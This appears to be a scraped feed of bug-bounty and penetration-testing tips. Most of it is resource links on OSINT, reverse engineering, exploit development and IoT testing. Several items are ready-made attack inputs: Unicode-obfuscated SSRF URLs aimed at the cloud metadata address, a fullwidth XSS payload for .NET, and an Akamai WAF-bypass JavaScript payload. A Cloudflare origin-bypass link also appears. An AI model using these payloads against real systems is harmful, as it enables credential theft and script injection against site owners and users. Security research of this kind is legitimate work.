Account takeover
https://t.co/YCK3GB5sJk
https://t.co/eRlkj3n6w2
https://t.co/tuQ3xEpIYc
https://t.co/vApKQSS7Ru
https://t.co/7l7wxb9btx
https://t.co/ETHFuyLd1v
https://t.co/z4FmmyO8xy
https://t.co/5EYYOudexQ
https://t.co/KBYLYDvon3
https://t.co/uim3l7JKir
#bugbounty
Medium
Got *Bounty* with Account takeover (ATO ) Unicode-Case Mapping Collision !
Hey hunters ! Recently I discovered a Unicode-Case Mapping Collision vulnerability on a private program.
Top #OSINT tools I used last project:
SEcraper - scrape many search engines at once vs query or keyword
https://github.com/zerobyte-id/SEcraper
Spiderfoot
https://spiderfoot.net
http://OSINT.link
Cheat Sheet
https://inteltechniques.com/JE/OSINT_Packet_2019.pdf
Quick Cloudflare bypass
http://crimeflare.org:82/cfs.html
GitHub
GitHub - zerobyte-id/SEcraper: Search engine scraper tool with BASH script.
Search engine scraper tool with BASH script. Contribute to zerobyte-id/SEcraper development by creating an account on GitHub.
SSRF's to bypass WAF
http://⑯⑨。②⑤④。⑯⑨。②⑤④/
http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/
http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
http://②⑧⑤②⓪③⑨①⑥⑥:80/
http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/
http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥
#bugbountytip The Request.queryString error in .NET prevents you from getting XSS? Try the %uff1cscript%uff1ealert(‘XSS’);%uff1c/script%uff1e payload ;)
5 Subdomain Takeover #ProTips.pdf:
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/7-part-100-article/new_articles/5%20Subdomain%20Takeover%20%23ProTips.pdf
Finding the Balance Between Speed & Accuracy During an Internet-wide Port Scanning.pdf:
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/2-part-100-article/Finding%20the%20Balance%20Between%20Speed%20&%20Accuracy%20During%20an%20Internet-wide%20Port%20Scanning.pdf
Phishing With a Rogue Wi-Fi Access Point.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/7-part-100-article/new_articles/Phishing%20With%20a%20Rogue%20Wi-Fi%20Access%20Point.pdf
#bugbountytip #Hacking #OSINT #Pentest
GitHub
blaCCkHatHacEEkr/PENTESTING-BIBLE
This repository was created and developed by Ammar Amer @cry__pto Only. Updates to this repository will continue to arrive until the number of links reaches 10000 links & 10000 pdf files .L...
A good way to bypass the Akamai WAF by exploiting a redirect-based XSS is with the following payload:
javascript:new%20Function`al\ert\`1\``;
You can also obfuscate it using HTML entities
#BugBounty
Social Distancing Survival Guide
Learn...
Reverse Engineering:
https://github.com/tylerha97/awesome-reversing
Reverse Engineering Malware:
https://malwareunicorn.org/workshops/re101.html#0
https://malwareunicorn.org/workshops/re102.html#0
Web Hacking:
https://portswigger.net/web-security
https://github.com/infoslack/awesome-web-hacking/blob/master/README.md
Exploit Development:
https://github.com/FabioBaroni/awesome-exploit-development/blob/master/README.md
GitHub
GitHub - tylerha97/awesome-reversing: A curated list of awesome reversing resources
A curated list of awesome reversing resources. Contribute to tylerha97/awesome-reversing development by creating an account on GitHub.
APT Lifecycle:
https://azeria-labs.com/advanced-persistent-threat/
Arm Assembly:
https://azeria-labs.com/writing-arm-assembly-part-1/
Arm32 Shellcoding:
https://azeria-labs.com/writing-arm-shellcode/
https://azeria-labs.com/tcp-reverse-shell-in-assembly-arm-32-bit/
Heap Exploitation:
https://azeria-labs.com/heap-exploit-development-part-1/
https://azeria-labs.com/heap-overflows-and-the-ios-kernel-heap/
https://azeria-labs.com/grooming-the-ios-kernel-heap/
Azeria-Labs
Advanced Persistent Threat
Pentesting IoT devices
Part 1: https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html
Part 2: https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html
Books and resources: https://github.com/V33RU/IoTSecurity101/blob/master/README.md
Mindedsecurity
Pentesting IoT devices (Part 1: Static Analysis)
Introduction Intelligent dishwashers, smart factories, connected sensors and Wi-Fi fridges, these are only a few examples of everyday ...